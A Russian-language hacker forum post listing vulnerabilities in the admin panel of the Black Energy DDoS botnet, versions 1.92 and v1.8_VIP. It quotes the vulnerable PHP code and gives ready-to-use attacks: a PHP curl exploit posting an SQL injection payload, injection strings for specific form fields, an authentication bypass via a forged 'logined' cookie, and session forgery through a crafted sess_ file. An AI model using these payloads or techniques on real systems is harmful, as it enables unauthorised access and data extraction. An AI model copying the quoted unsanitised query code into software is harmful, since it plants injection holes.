[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cookie: blabla=6gui67gg7t76rf7iiiirvr76r67v\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Кто допер, тот допер... |
|
|
|
09.12.2011, 17:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Уязвимости админ панели у Black Energy ddos bot
1) Версия 1.92
Возможно раскрытие путей через session_start();, для этого в PHPSESSID установите !@#$%@#@
При magic_quotes_gpc = off возможна sql inj в REPLACE INTO
Уязвимый код в index.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'opt'[/COLOR][COLOR="#007700"]]))
{
if (!isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'opt'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'spoof_ip'[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'opt'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'spoof_ip'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
foreach ([/COLOR][COLOR="#0000BB"]array_keys[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'opt'[/COLOR][COLOR="#007700"]]) as[/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]db_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"REPLACE INTO `opt` (`name`, `value`) VALUES ('[/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'opt'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
}
}
....
[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]db_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM `opt`"[/COLOR][COLOR="#007700"]);
while ([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]))
[/COLOR][COLOR="#0000BB"]$opt[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]] =[/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'value'[/COLOR][COLOR="#007700"]];
[/COLOR][/COLOR]
Есть мини сплоент
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://127.0.0.1/be/www/index.php"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"opt[cmd'/*]=*/, (select version()) ) -- 1"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);
function[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$refer[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_USERAGENT[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Opera/9.61 (Windows NT 5.1; U; Edition Campaign 05; en) Presto/2.1.1"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POSTFIELDS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$post[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_REFERER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$refer[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_COOKIE[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"PHPSESSID=7ea3b2c1f4150f4948555ac26263dd33;"[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// нужно указать свой для авторизации
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_FOLLOWLOCATION[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ch[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$answer[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
Кстати, если есть доступ к северу с сайта соседа и место хранения сессий одинаковое (/tmp/ например) сессию можно легко подделать. Там не проверяются логин и пароль, а проверяется auth на значение true
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'auth'[/COLOR][COLOR="#007700"]]))[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Для этого создаете в хранилище файл с названием sess_123456 и содержанием auth|b:1; , после чего в Cookie подменяете PHPSESSID на 123456.
При использовании мультибайтовой кодировки в бд возможна еще иньекция в stat.php через addslashes(), но это думаю очень повезти должно.
2) Версия v1.8_VIP
Обход авторизации
Уязвимый код в index.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$logined[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logined'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$logined[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$logined[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
В cookie достаточно установить logined с любым значением и авторизация пройдет.
В админке есть 3 sql inj, через INSERT,DELETE и есть через REPLACE которая описана выше.
Опишу sql inj через insert
Уязвимый код в index.php:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]case[/COLOR][COLOR="#DD0000"]"add"[/COLOR][COLOR="#007700"]:
if (empty([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]))
break;
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'country'[/COLOR][COLOR="#007700"]]))[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'country'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]strtoupper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'country'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO `files`
(`url`, `dnum`, `country`)
VALUES
('[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'url'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dnum'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"', '[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'country'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]')
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"location: index.php"[/COLOR][COLOR="#007700"]);
break;
[/COLOR][/COLOR]
Для эксплатации в
url пишем test' /*
в for country: пишем */ ,'1', (select version()) )--
Тут есть маленький подвох еще, длина поля country (в котором вывод) всего 10 символов, так что крутить придется выдирая данные частями либо через ошибку. |
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
